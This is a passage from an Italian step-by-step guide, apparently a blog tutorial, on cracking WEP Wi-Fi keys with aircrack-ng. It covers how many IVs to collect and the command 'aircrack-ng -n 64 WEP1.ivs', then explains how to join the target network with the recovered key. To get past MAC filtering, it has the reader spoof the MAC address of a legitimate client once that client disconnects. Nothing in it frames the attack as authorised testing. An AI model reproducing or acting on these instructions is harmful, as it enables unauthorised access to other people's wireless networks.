Aicrack continuerà a collezionare IV finché non lo fermate. Più IV scaricate e più probabilità avete di decifrare la chiave. Non c’è un riferimento esatto del tipo “lunghezza chiave = tot numero di IV da scaricare”. In linea generale prendete per buono che per trovare una chiave WEP da 40 bit potete scaricare dai 250.000 ai 400.000 IV: Aircrack dovrebbe trovare la chiave in pochi secondi. Ad ogni modo vi conviene cominciare con pochi IV infatti, se questi non bastano ad Aircrack per trovare
la chiave WEP, non dovrete ricominciare tutto da zero: basterà che quando vi verrà chiesto il nome che volete dare al file inseriate lo stesso nome che avevate già utilizzato in precedenza (in tal modo il file non verrà sovrascritto ma verrà invece “continuato”, cioè incrementato). Per una chiave da 104 bit collezionate circa 2.000.000 di IV: a volte ne bastano molti meno (anche se il programma impiegherà più tempo per trovare la chiave), altre volte purtroppo dovrete scaricarne di più…

Quando sarete soddisfatti del numero di IV collezionati premete “CTRL + C” per fermare il programma.

Scrivendo “Aircrack-ng” nel prompt vi verrà mostrata la lista dei parametri che è possibile utilizzare. Supponiamo di aver scaricato intorno ai 400.000 IV, in genere sufficienti per scovare una chiave WEP da 40 bit. Digitiamo allora il comando “aircrack-ng -n 64 WEP1.ivs”. Con il parametro “-n 64” diciamo al programma che la chiave ha una lunghezza massima di 64 bit e di non provare quindi oltre (anche perché, come già ricordato, non abbiamo ancora scaricato abbastanza IV per lunghezze di chiave maggiori). Il parametro “-f” che in questo esempio non abbiamo utilizzato serve per specificare l’intensità dell’attacco brute-force che di default è a livello 2: volendo potete specificare un livello maggiore, ad esempio 5.

Da notare anche l’estensione del file (WEP1.ivs): sarà *.ivs se avevate deciso di salvare soltanto gli IV, sarà *.cap se avevate deciso di salvare gli interi pacchetti catturati.

Se avrete fortuna il programma vi restituirà un messaggio di “KEY FOUND” seguito dal nome della chiave.

Ora che avete la chiave utilizzatela proprio come se doveste connettervi ad una vostra rete “domestica”. Se l’SSID dell’Access Point è abilitato seguite questa spiegazione; in caso contrario vi rimando all’ultimo paragrafo di questa guida.

Start, Connetti a, Connessioni di rete senza fili, Visualizza reti senza fili disponibili. Se l’SSID è abilitato (è visibile), questo vi appare nella finestra delle connessioni disponibili (e in genere potete anche vedere se utilizza il WPA o meno come sistema di cifratura). Fate doppio clic sull’icona della connessione ed inserite la password che avete trovato in precedenza: è fatta.

Perchè non riesco a collegarmi all’ AP ?

Se non riuscite a collegarvi la causa può essere:

  1. L’access Point utilizza un filtro per indirizzi MAC
  2. Siete troppo lontani dall’Access Point
  3. La chiave che avete trovato è errata

Vediamo i motivi nel dettaglio:

  1. L’AP utilizza un filtro per indirizzi MAC. In precedenza vi era stato detto di annotarvi gli indirizzi MAC che stavano dialogando con l’AP. Ora la cosa più semplice da fare è:
    – Aspettare che uno degli indirizzi MAC annotati in precedenza si scolleghi
    – Cambiare il nostro indirizzo MAC in modo da renderlo uguale a quello che si è appena scollegato (MAC Spoofing)
    – Entrare nell’Access Point :-) .
  2. Siete troppo lontani dall’Access Point. Bisogno di spiegazioni??? Avvicinatevi…
  3. La chiave che avete trovato è errata. O meglio… è possibile che sia corretta: assicuratevi di averla scritta in modo giusto. In particolar modo assicuratevi di non aver scritto eventuali zeri (“0”) come delle “O” in quanto non ci possono essere delle “O”!

Se l’SSID dell’Access Point è disabilitato nessun problema. Voi conoscete già qual è, vi è stato rivelato da Aircrack: vedi immagine sopra, ESSID. Quello che dovete fare è semplicemente inserire l’SSID trovato nelle impostazioni di connessione.
Start, Connetti a, Connessioni di rete senza fili, Visualizza reti senza fili disponibili, Modifica impostazioni avanzate, Reti senza fili, Aggiungi: scrivete l’SSID così come lo ha trovato Aircrack, l’autenticazione alla rete è normalmente APERTA > scegliere la cifratura WEP, togliere il segno di spunta dalla voce “la chiave sarà fornita automaticamente” ed inserire invece la chiave WEP che avete trovato grazie ad Aircrack (nota: inserite la chiave tutta di seguito, senza i due punti (“:”) di separazione).

Quanti IVs ci vogliono per crackare il WEP ?

Crackare il WEP non è una scienza esatta. Il numero di IVs richiesti dipende dalla lunghezza della chiave WEP e dalla tua fortuna. Di solito, una chiave WEP 40-bit si può crackare con 300.000 IVs, e una chiave WEP da 104-bit con 1.000.000 di IVs; se sei sfigato, puoi avere bisogno di 2 milioni di IVs, o anche più.

Non c’è modo di sapere quanto è lunga una chiave WEP: questa informazione è segreta e non viene diffusa, nè nelle frame di gestione nè in quelle dati; quindi, airodump non può indicare la lunghezza della chiave. Perciò è consigliabile eseguire aircrack 2 volte: quando hai 250.000 IVs, lancia aircrack con l’opzione “-n 64″ per crackare il WEP a 40-bit. Quindi se non trovi la chiave, rilancia aircrack (senza l’opzione -n) per crackare la chiave WEP a 104-bit.